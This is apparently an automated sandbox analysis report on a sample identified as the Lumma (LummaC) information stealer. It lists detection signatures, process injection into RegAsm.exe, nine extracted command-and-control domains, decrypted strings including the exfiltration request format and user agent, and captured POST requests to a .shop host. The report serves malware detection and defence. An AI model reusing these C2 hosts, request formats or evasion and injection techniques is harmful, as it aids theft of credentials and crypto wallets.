Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Rebina.exe

Overview

General Information

Sample name:Rebina.exe
Analysis ID:1500380
MD5:30cbc399e37eef662eaeb7d90148f013
SHA1:349839e58f61a81512d2545bd70ca0d0d7baa549
SHA256:bfde2ff885475fc1212ff255cc5f4e17b0ede10a8ee21b7b83cd34fc0ad73a03
Tags:exe
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Rebina.exe (PID: 6984 cmdline: "C:\Users\user\Desktop\Rebina.exe" MD5: 30CBC399E37EEF662EAEB7D90148F013)
    • conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 2672 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 2436 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 5232 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • WerFault.exe (PID: 2104 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5232 -s 1624 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["locatedblsoqp.shop", "traineiwnqo.shop", "caffegclasiqwp.shop", "stamppreewntnq.shop", "millyscroqwp.shop", "condedqpwqm.shop", "assumptionflattyou.shop", "stagedchheiqwo.shop", "evoliutwoqm.shop"], "Build id": "HpOoIh--@Ken0zz"}
SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    No Sigma rule has matched
    Timestamp:2024-08-28T11:17:02.186665+0200
    SID:2049812
    Severity:1
    Source Port:49705
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-28T11:17:02.186665+0200
    SID:2054653
    Severity:1
    Source Port:49705
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-28T11:17:01.289610+0200
    SID:2049836
    Severity:1
    Source Port:49704
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-28T11:17:01.289610+0200
    SID:2054653
    Severity:1
    Source Port:49704
    Destination Port:443
    Protocol:TCP
    Classtype:A Network Trojan was detected

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: Rebina.exeAvira: detected
    Source: condedqpwqm.shopAvira URL Cloud: Label: phishing
    Source: https://assumptionflattyou.shop/apiAvira URL Cloud: Label: phishing
    Source: stamppreewntnq.shopAvira URL Cloud: Label: phishing
    Source: assumptionflattyou.shopAvira URL Cloud: Label: phishing
    Source: caffegclasiqwp.shopAvira URL Cloud: Label: malware
    Source: locatedblsoqp.shopAvira URL Cloud: Label: phishing
    Source: https://assumptionflattyou.shop/Avira URL Cloud: Label: phishing
    Source: https://assumptionflattyou.shop/api:Avira URL Cloud: Label: phishing
    Source: millyscroqwp.shopAvira URL Cloud: Label: malware
    Source: https://assumptionflattyou.shop/picAvira URL Cloud: Label: phishing
    Source: stagedchheiqwo.shopAvira URL Cloud: Label: phishing
    Source: traineiwnqo.shopAvira URL Cloud: Label: malware
    Source: 4.2.RegAsm.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["locatedblsoqp.shop", "traineiwnqo.shop", "caffegclasiqwp.shop", "stamppreewntnq.shop", "millyscroqwp.shop", "condedqpwqm.shop", "assumptionflattyou.shop", "stagedchheiqwo.shop", "evoliutwoqm.shop"], "Build id": "HpOoIh--@Ken0zz"}
    Source: assumptionflattyou.shopVirustotal: Detection: 15%Perma Link
    Source: https://assumptionflattyou.shop/apiVirustotal: Detection: 13%Perma Link
    Source: assumptionflattyou.shopVirustotal: Detection: 15%Perma Link
    Source: stamppreewntnq.shopVirustotal: Detection: 17%Perma Link
    Source: condedqpwqm.shopVirustotal: Detection: 17%Perma Link
    Source: evoliutwoqm.shopVirustotal: Detection: 6%Perma Link
    Source: locatedblsoqp.shopVirustotal: Detection: 17%Perma Link
    Source: https://assumptionflattyou.shop/Virustotal: Detection: 15%Perma Link
    Source: millyscroqwp.shopVirustotal: Detection: 21%Perma Link
    Source: stagedchheiqwo.shopVirustotal: Detection: 17%Perma Link
    Source: caffegclasiqwp.shopVirustotal: Detection: 20%Perma Link
    Source: traineiwnqo.shopVirustotal: Detection: 20%Perma Link
    Source: https://assumptionflattyou.shop/api:Virustotal: Detection: 13%Perma Link
    Source: Rebina.exeVirustotal: Detection: 60%Perma Link
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: 4.2.RegAsm.exe.400000.0.raw.unpackString decryptor: caffegclasiqwp.shop
    Source: 4.2.RegAsm.exe.400000.0.raw.unpackString decryptor: stamppreewntnq.shop
    Source: 4.2.RegAsm.exe.400000.0.raw.unpackString decryptor: stagedchheiqwo.shop
    Source: 4.2.RegAsm.exe.400000.0.raw.unpackString decryptor: millyscroqwp.shop
    Source: 4.2.RegAsm.exe.400000.0.raw.unpackString decryptor: evoliutwoqm.shop
    Source: 4.2.RegAsm.exe.400000.0.raw.unpackString decryptor: condedqpwqm.shop
    Source: 4.2.RegAsm.exe.400000.0.raw.unpackString decryptor: traineiwnqo.shop
    Source: 4.2.RegAsm.exe.400000.0.raw.unpackString decryptor: locatedblsoqp.shop
    Source: 4.2.RegAsm.exe.400000.0.raw.unpackString decryptor: assumptionflattyou.shop
    Source: 4.2.RegAsm.exe.400000.0.raw.unpackString decryptor: lid=%s&j=%s&ver=4.0
    Source: 4.2.RegAsm.exe.400000.0.raw.unpackString decryptor: TeslaBrowser/5.5
    Source: 4.2.RegAsm.exe.400000.0.raw.unpackString decryptor: - Screen Resoluton:
    Source: 4.2.RegAsm.exe.400000.0.raw.unpackString decryptor: - Physical Installed Memory:
    Source: 4.2.RegAsm.exe.400000.0.raw.unpackString decryptor: Workgroup: -
    Source: 4.2.RegAsm.exe.400000.0.raw.unpackString decryptor: HpOoIh--@Ken0zz
    Source: Rebina.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 104.21.66.182:443 -> 192.168.2.5:49704 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.66.182:443 -> 192.168.2.5:49705 version: TLS 1.2
    Source: Rebina.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: c:\388fm14yqlq\obj\Release\doX.pdb source: Rebina.exe
    Source: Binary string: c:\388fm14yqlq\obj\Release\doX.pdbP source: Rebina.exe
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+04h]4_2_00435076
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx4_2_004358F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp]4_2_00435C11
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx4_2_0040BD10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, word ptr [ebx]4_2_00438860
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 625B6034h4_2_0041F871
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movsx ebx, byte ptr [ecx]4_2_00437022
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebp, word ptr [ecx+ebx*2]4_2_00430090
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov esi, 00008000h4_2_004040A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]4_2_00421140
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 625B6034h4_2_0041F942
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [ecx+01h], 00000000h4_2_00414967
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [ecx+01h], 00000000h4_2_00414967
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h4_2_00414967
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]4_2_0042B110
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esp], 00000000h4_2_00413130
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+000000A0h]4_2_00411138
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esp+78h], 00000000h4_2_004119CB
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [ecx], 00000000h4_2_004119EF
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]4_2_0040E9AD
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp]4_2_0040A250
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, word ptr [esi+eax]4_2_00432210
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx4_2_00435AFC
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp]4_2_0041AA80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 84AA3BD1h4_2_00438280
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp]4_2_00436280
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 625B6034h4_2_0041FAA8
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 44CAAEB6h4_2_0041A2B4
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+ebx*8], 0960C135h4_2_0041A2B4
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]4_2_00414355
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [esi], 00000000h4_2_0040EB2D
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esi], FFFFFFFFh4_2_004033F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [esi], bl4_2_00401BF4
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, eax4_2_0041F38A
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 625B6034h4_2_0041FB8E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]4_2_0041EBB1
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebp, eax4_2_00406C10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp]4_2_00435CCE
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]4_2_00437D50
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h4_2_00419500
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]4_2_0041CD30
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+000001C4h]4_2_004245D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+00000810h]4_2_004245D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+000000D8h]4_2_004245D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+00000564h]4_2_004245D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al4_2_004245D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al4_2_004245D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+34h]4_2_004245D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+34h]4_2_004245D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh4_2_004245D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+18h]4_2_004245D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax4_2_0041EDF3
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [esi], bl4_2_00401E57
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [esi], bl4_2_00401E3C
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0960C135h4_2_00419F16
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [esi+eax], 00000000h4_2_00421730
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx4_2_00419780
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [ebp-14h]4_2_0041DF97
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 625B6034h4_2_0041DF97
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]4_2_0041DF97

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 104.21.66.182:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 104.21.66.182:443
    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 104.21.66.182:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.66.182:443
    Source: Malware configuration extractorURLs: locatedblsoqp.shop
    Source: Malware configuration extractorURLs: traineiwnqo.shop
    Source: Malware configuration extractorURLs: caffegclasiqwp.shop
    Source: Malware configuration extractorURLs: stamppreewntnq.shop
    Source: Malware configuration extractorURLs: millyscroqwp.shop
    Source: Malware configuration extractorURLs: condedqpwqm.shop
    Source: Malware configuration extractorURLs: assumptionflattyou.shop
    Source: Malware configuration extractorURLs: stagedchheiqwo.shop
    Source: Malware configuration extractorURLs: evoliutwoqm.shop
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: assumptionflattyou.shop
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=UItWLPb.jffFkQHYxCXahyQUyV48gMmu7BqJwD1OjBo-1724836621-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: assumptionflattyou.shop
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficDNS traffic detected: DNS query: assumptionflattyou.shop
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: assumptionflattyou.shop
    Source: Amcache.hve.8.drString found in binary or memory: http://upx.sf.net
    Source: RegAsm.exe, 00000004.00000002.2248451370.000000000105A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2248451370.0000000001074000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assumptionflattyou.shop/
    Source: RegAsm.exe, 00000004.00000002.2248451370.0000000001074000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2248451370.000000000102A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assumptionflattyou.shop/api
    Source: RegAsm.exe, 00000004.00000002.2248451370.0000000001074000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assumptionflattyou.shop/api:
    Source: RegAsm.exe, 00000004.00000002.2248451370.0000000001074000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assumptionflattyou.shop/pic
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknownHTTPS traffic detected: 104.21.66.182:443 -> 192.168.2.5:49704 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.66.182:443 -> 192.168.2.5:49705 version: TLS 1.2
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042AED0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,4_2_0042AED0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042AED0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,4_2_0042AED0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004228D5 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,4_2_004228D5

    System Summary

    barindex
    Source: Rebina.exe, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 282112
    Source: C:\Users\user\Desktop\Rebina.exeCode function: 0_2_00E109880_2_00E10988
    Source: C:\Users\user\Desktop\Rebina.exeCode function: 0_2_00E109870_2_00E10987
    Source: C:\Users\user\Desktop\Rebina.exeCode function: 0_2_00E10C1B0_2_00E10C1B
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040A8004_2_0040A800
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004358F04_2_004358F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040BD104_2_0040BD10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004388604_2_00438860
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004370224_2_00437022
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004078304_2_00407830
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041D0304_2_0041D030
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040008E4_2_0040008E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041D8904_2_0041D890
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004040A04_2_004040A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040C95D4_2_0040C95D
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004071604_2_00407160
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004149674_2_00414967
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004161004_2_00416100
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042F9304_2_0042F930
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004119EF4_2_004119EF
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040E9AD4_2_0040E9AD
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004369B04_2_004369B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00404AF04_2_00404AF0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041AA804_2_0041AA80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004382804_2_00438280
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041A2B44_2_0041A2B4
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004143554_2_00414355
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00436B734_2_00436B73
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00436B004_2_00436B00
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040EB2D4_2_0040EB2D
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041F38A4_2_0041F38A
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041C3904_2_0041C390
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040245A4_2_0040245A
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040247C4_2_0040247C
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00406C104_2_00406C10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00407CC04_2_00407CC0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004304D04_2_004304D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00403CE04_2_00403CE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004054904_2_00405490
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004024A94_2_004024A9
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00436CB04_2_00436CB0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040B5604_2_0040B560
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004385704_2_00438570
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004025204_2_00402520
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041FD204_2_0041FD20
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00436DC04_2_00436DC0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041B5D04_2_0041B5D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004245D04_2_004245D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041EDF34_2_0041EDF3
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00401D904_2_00401D90
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040E6164_2_0040E616
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040D6AB4_2_0040D6AB
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040CF004_2_0040CF00
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00419F164_2_00419F16
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00405F204_2_00405F20
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004087D04_2_004087D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041DF974_2_0041DF97
